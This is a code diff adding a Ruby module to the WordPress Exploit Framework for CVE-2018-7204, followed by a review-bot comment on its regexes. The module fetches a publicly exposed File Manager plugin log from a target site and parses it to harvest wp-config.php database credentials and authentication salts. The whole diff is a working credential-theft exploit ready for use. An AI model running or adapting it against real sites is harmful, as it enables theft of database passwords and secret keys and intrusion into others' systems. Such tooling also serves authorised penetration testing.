|
| 1 | +# frozen_string_literal: true |
| 2 | + |
| 3 | +class Wpxf::Auxiliary::FileManagerDatabaseCredentialsDisclosure < Wpxf::Module |
| 4 | + include Wpxf |
| 5 | + |
| 6 | + def initialize |
| 7 | + super |
| 8 | + |
| 9 | + update_info( |
| 10 | + name: 'File Manager <= 5.0.1 Database Credentials Disclosure', |
| 11 | + desc: %( |
| 12 | + Prior to version 5.0.2 of the File Manager plugin, any changes |
| 13 | + made to the wp-config.php file via the plugin would result |
| 14 | + in a backup being stored in a publicly accessible plain text |
| 15 | + file. This module will download and parse the file to harvest |
| 16 | + the database credentials and salts. |
| 17 | + ), |
| 18 | + author: [ |
| 19 | + 'Colette Chamberland', # Disclosure |
| 20 | + 'rastating' # WPXF module |
| 21 | + ], |
| 22 | + references: [ |
| 23 | + ['CVE', '2018-7204'], |
| 24 | + ['WPVDB', '9036'] |
| 25 | + ], |
| 26 | + date: 'Mar 02 2018' |
| 27 | + ) |
| 28 | + end |
| 29 | + |
| 30 | + def check |
| 31 | + check_plugin_version_from_changelog('file-manager', 'readme.txt', '5.0.2') |
| 32 | + end |
| 33 | + |
| 34 | + def log_url |
| 35 | + normalize_uri(wordpress_url_uploads, 'file-manager', 'log.txt') |
| 36 | + end |
| 37 | + |
| 38 | + def parse_log(log) |
| 39 | + loot = [{ key: 'Key', value: 'Value' }] |
| 40 | + wanted_keys = [ |
| 41 | + 'DB_NAME', |
| 42 | + 'DB_USER', |
| 43 | + 'DB_PASSWORD', |
| 44 | + 'DB_HOST', |
| 45 | + 'AUTH_KEY', |
| 46 | + 'SECURE_AUTH_KEY', |
| 47 | + 'LOGGED_IN_KEY', |
| 48 | + 'NONCE_KEY', |
| 49 | + 'AUTH_SALT', |
| 50 | + 'SECURE_AUTH_SALT', |
| 51 | + 'LOGGED_IN_SALT', |
| 52 | + 'NONCE_SALT' |
| 53 | + ] |
| 54 | + |
| 55 | + matches = log.scan(/define\(\\'.+?',\s+?\\'.+?'\);/i) |
| 56 | + matches.each do |match| |
| 57 | + kvp = match.match(/define\(\\'(.+?)\\',\s+?\\'(.+?)\\'\);/i)&.captures |
| 58 | + next if kvp.nil? |
| 59 | + loot.push(key: kvp[0], value: kvp[1]) if wanted_keys.include? kvp[0] |
| 60 | + end |
| 61 | + |
| 62 | + loot |
| 63 | + end |
| 64 | + |
| 65 | + def run |
| 66 | + return false unless super |
| 67 | + |
| 68 | + emit_info 'Downloading log...' |
| 69 | + res = execute_get_request(url: log_url) |
| 70 | + if res&.code != 200 |
| 71 | + emit_error 'Failed to download log' |
| 72 | + return false |
| 73 | + end |
| 74 | + |
| 75 | + emit_info 'Parsing log...' |
| 76 | + loot = parse_log(res.body) |
| 77 | + |
| 78 | + if loot.length == 1 |
| 79 | + emit_error 'Could not find wp-config.php within the log' |
| 80 | + return false |
| 81 | + end |
| 82 | + |
| 83 | + emit_table loot |
| 84 | + true |
| 85 | + end |
| 86 | +end |
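Review bot: `parse_log` runs two regexes over the same text, and the `scan` pattern at file line 55 escapes only the opening quote of each operand (`\\'.+?'`) while the per-match pattern at line 57 escapes all four; the first pass only works because the lazy `.+?` happens to swallow the backslash before the closing quote. A single scan with capture groups drops the second pass and the `nil` guard: `log.scan(/define\(\\'(.+?)\\',\s+?\\'(.+?)\\'\);/i).each do |key, value|` / `loot.push(key: key, value: value) if wanted_keys.include?(key)` / `end`. Two limits of the pattern are worth a comment on the method: a value containing an escaped single quote is cut short at the first `\'` by the lazy quantifier, and the match is case-insensitive while `wanted_keys.include?` is not, so a differently-cased constant name is silently dropped. If the log holds more than one wp-config.php backup, the same key is presumably emitted once per backup; if that is intended, say so in the method's documentation.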